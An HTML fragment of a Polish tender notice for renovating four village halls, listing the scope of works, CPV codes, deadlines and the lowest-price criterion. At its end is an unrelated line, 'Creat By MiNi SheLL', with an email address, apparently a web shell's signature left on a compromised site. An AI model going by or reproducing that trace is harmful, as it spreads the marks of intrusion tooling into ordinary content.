<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.26.12.10-9, 45.44.21.00-8, 45.33.12.10-1, 45.43.10.00-7, 45.33.11.00-7, 45.33.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont sali wiejskiej w Korpysach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kubatura budynku 1223,24 m3, pow. użytkowa 292,87 m2. Zamówienie obejmuje:
1)	remont i ocieplenie sufitu podwieszanego;
2)	klimatyzacja wewnętrzna sali;
3)	remont wnętrza sali;
4)	remont sanitariatów;
5)	remont zaplecza kuchennego i garażu;
6)	remont pieca;
7)	zakup wyposażenia;
8)	wykonanie wewnętrznych linii zasilających - WLZ, rozdzielnie i sterowanie GPW;
9)	wykonanie instalacji oświetlenia, gniazd wtyczkowych 230V oraz siły i sterowania;
10)	demontaż starej instalacji.
Szczegółowy opis i zakres przedmiotu zamówienia określa dokumentacja projektowa, w tym przedmiar robót  ( załącznik nr 6.2. do specyfikacji ), oraz specyfikacja techniczna wykonania i odbioru robót budowlanych ( załącznik nr 7.2.  do specyfikacji )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.22-9, 45.33.10.00-6, 45.42.10.00-4, 45.33.24.00-7, 45.40.00.00-1, 45.45.31.00-8, 45.45.00.00-6, 45.31.00.00-3, 45.31.57.00-5, 45.31.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont sali wiejskiej w Olszynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kubatura budynku 1026,35 (1242,39 m3), pow. użytkowa 212,50 m2. Zamówienie obejmuje:
1)	roboty rozbiórkowe;
2)	podwyższenie budynku wraz z wylaniem wieńca żelbetonowego i trzpieni żelbetonowych w ścianach zewnętrznych;
3)	konstrukcja dachu z pokryciem i odwodnieniem;
4)	wykończenie wnętrza;
5)	wykonanie instalacji elektrycznej wraz z tablicą rozdzielczą;
6)	wykonanie pomiarów elektrycznych;
7)	demontaż starej instalacji.
Szczegółowy opis i zakres przedmiotu zamówienia określa dokumentacja projektowa, w tym przedmiar robót  ( załącznik nr 6.3. do specyfikacji ), oraz specyfikacja techniczna wykonania i odbioru robót budowlanych ( załącznik nr 7.3. do specyfikacji )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.11.00.00-1, 45.41.00.00-4, 45.26.25.00-6, 45.44.21.00-8, 45.26.23.11-4, 45.22.32.10-1, 45.26.12.10-9, 45.33.12.10-1, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont sali wiejskiej w Szklarce Myślniewskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kubatura budynku 1417,5 m3, pow. użytkowa 343,99 m2. Zamówienie obejmuje:
1)	wymiana pokrycia dachu;
2)	remont i ocieplenie sufitu podwieszanego;
3)	remont wnętrza Sali;
4)	remont sanitariatów;
5)	remont zaplecza kuchni i Sali narad;
6)	remont pieca;
7)	remont garażu;
8)	montaż wentylatorów dachowych;
9)	wykonanie wewnętrznych linii zasilających - WLZ, rozdzielnie i sterowanie GPW;
10)	wykonanie instalacji oświetlenia, gniazd wtyczkowych 230V oraz siły i sterowania;
11)	demontaż starej instalacji;
12)	wykonanie instalacji c.o.;
13)	wykonanie technologii kotłowni.
Szczegółowy opis i zakres przedmiotu zamówienia określa dokumentacja projektowa, w tym przedmiar robót  ( załącznik nr 6.4. do specyfikacji ), oraz specyfikacja techniczna wykonania i odbioru robót budowlanych ( załącznik nr 7.4. do specyfikacji )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.21-8, 45.21.50.00-7, 45.44.00.00-3, 45.33.24.00-7, 45.40.00.00-1, 45.45.00.00-6, 45.35.10.00-2, 45.31.00.00-3, 45.31.57.00-5, 45.31.10.00-0, 45.33.11.00-7, 45.33.11.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remont sali wiejskiej w Szklarce Przygodzickiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kubatura budynku 2021,70 m3, pow. użytkowa 419,49 m2. Zamówienie obejmuje:
1)	remont dachu;
2)	remont sufitu podwieszanego;
3)	malowanie pomieszczeń i stolarki drzwiowej;
4)	wykonanie wentylacji mechanicznej;
5)	remont podłogi;
6)	wykonanie wewnętrznych linii zasilających - WLZ, rozdzielnie i sterowanie GPW;
7)	wykonanie instalacji oświetlenia, gniazd wtyczkowych 230V oraz siły i sterowania;
8)	demontaż starej instalacji.
Szczegółowy opis i zakres przedmiotu zamówienia określa dokumentacja projektowa, w tym przedmiar robót  ( załącznik nr 6.5. do specyfikacji ), oraz specyfikacja techniczna wykonania i odbioru robót budowlanych ( załącznik nr 7.5. do specyfikacji )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.44.21.00-8, 45.33.12.10-1, 45.31.00.00-3, 45.31.57.00-5, 45.31.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com